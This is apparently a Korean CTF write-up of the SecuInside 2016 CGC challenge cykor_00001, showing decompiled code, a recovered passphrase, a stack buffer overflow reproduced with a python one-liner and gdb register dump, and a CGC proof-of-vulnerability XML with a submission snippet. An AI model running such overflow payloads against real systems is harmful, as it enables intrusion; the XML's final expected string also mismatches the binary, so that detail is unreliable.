SecuInside 2016 - CGC/cykor_00001-100
1. cgc 파일 elf 포멧으로 변경
vagrant@crs:~$ cgc2elf cykor_00001
vagrant@crs:~$ ls
cykor_00001 |
2. ssh 통신하므로 sftp 활용하여, 파일 복사 후 ida로 분석
signed int sub_80481C0()
{
char v1; // [esp+3Ch] [ebp-2Ch]@3
char v2; // [esp+3Dh] [ebp-2Bh]@9
char v3; // [esp+3Eh] [ebp-2Ah]@10
char v4; // [esp+3Fh] [ebp-29h]@11
char v5; // [esp+40h] [ebp-28h]@12
char v6; // [esp+41h] [ebp-27h]@13
char v7; // [esp+42h] [ebp-26h]@14
char v8; // [esp+43h] [ebp-25h]@15
char v9; // [esp+44h] [ebp-24h]@16
char v10; // [esp+45h] [ebp-23h]@17
char v11; // [esp+46h] [ebp-22h]@18
char v12; // [esp+47h] [ebp-21h]@19
char v13; // [esp+48h] [ebp-20h]@20
char v14; // [esp+49h] [ebp-1Fh]@21
char v15; // [esp+4Ah] [ebp-1Eh]@22
char v16; // [esp+4Bh] [ebp-1Dh]@23
int v17; // [esp+54h] [ebp-14h]@26
unsigned int i; // [esp+58h] [ebp-10h]@1
int v19; // [esp+60h] [ebp-8h]@1
v19 = 0;
for ( i = 0; i < 0x18; ++i )
*(&v1 + i) = 0;
if ( sub_8048470(1, (int)"What is your message?\n", 0x16u) )
sub_804867C(0);
if ( sub_8048560(0, (int)&v1, 0x18u, 10) )
return -1;
if ( v1 != 'H' || v2 != '4' )
return 7;
if ( v3 != 'P' || v4 != 'P' )
return 6;
if ( v5 != 'Y' || v6 != '_' )
return 5;
if ( v7 != 'S' || v8 != '3' )
return 4;
if ( v9 != 'C' || v10 != 'U' )
return 3;
if ( v11 != 'I' || v12 != 'N' )
return 2;
if ( v13 != 'S' || v14 != 'I' )
return 1;
if ( v15 == 'D' && v16 == '3' && sub_8048470(1, (int)"+ Are you serious?\n", 0x13u) )
sub_804867C(0);
v17 = sub_8048 |
--> H4PPY_S3CUINSID3
3. 취약한 함수 확인
signed int sub_80480A0()
{
char v1[64]; // [esp+28h] [ebp-50h]@3
int v2; // [esp+68h] [ebp-10h]@1
unsigned int i; // [esp+6Ch] [ebp-Ch]@1
v2 = 0;
for ( i = 0; i < 64; ++i )
v1[i] = 0;
if ( sub_8048560(0, (int)v1, 128u, 10) )
return -1;
for ( i = 0; v1[i]; ++i )
++v2;
if ( sub_8048470(1, (int)"- Why so serious?\n", 0x12u) )
sub_804867C(0);
return v2;
} |
--> 입력값이 80개 이상 넣을 경우 bof 발생 (EIP 변경 확인)
vagrant@crs:~$ (python -c 'print "H4PPY_S3CUINSID3" + "\n" + "a"*84 + "b"*4';cat ) |./cykor_00001_cgc_file
What is your message?
+ Are you serious?
- Why so serious?
Segmentation fault (core dumped)
vagrant@crs:~$ gdb ./cykor_00001_cgc_file core GNU gdb (GDB) 7.9
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./cykor_00001_cgc_file...(no debugging symbols found)...done.
warning: core file may not match specified executable file.
[New LWP 3833]
Core was generated by `'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x62626262 in ?? ()
(gdb) i r
eax 0x616161a6 1633771942
ecx 0x12 18
edx 0x80487bf 134514623
ebx 0x0 0
esp 0xbaaaaf8c 0xbaaaaf8c
ebp 0x61616161 0x61616161
esi 0x61616161 1633771873
edi 0x0 0
eip 0x62626262 0x62626262
eflags 0x10292 [ AF SF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x7b 123
gs 0x7b 123
(gdb) q
vagrant@crs:~$ |
4. CGC에 맞는 xml 코드 작성
※ 참고
1) http://kblab.tistory.com/287
2) https://cgc-docs.legitbs.net/cgc-release-documentation/walk-throughs/understanding-cfe-povs/ /
3) https://github.com/CyberGrandChallenge/cgc-release-documentation/blob/master/walk-throughs/pin-for-decree.md
<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<pov>
<cbid>service</cbid>
<replay>
// recv
<read><delim>\x0a</delim><match><data>What is your message?\x0a</data></match></read>
// send
<write><data>H4PPY_S3CUINSID3\x0a</data></write>
// recv
<read><delim>\x0a</delim><match><data>+ Are you serious?\x0a</data></match></read>
// send, [a * 84]
<write><data>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x0a</data></write>
// recv
<read><delim>\x0a</delim><match><data>- Are you serious?\x0a</data></match></read>
</replay>
</pov> |
5. 파일 전송
payload = open('crattack.xml', 'rb').read()
print r.recvuntil( 'XML)' )
r.sendline(payload) print r.recv()
r.interactive() |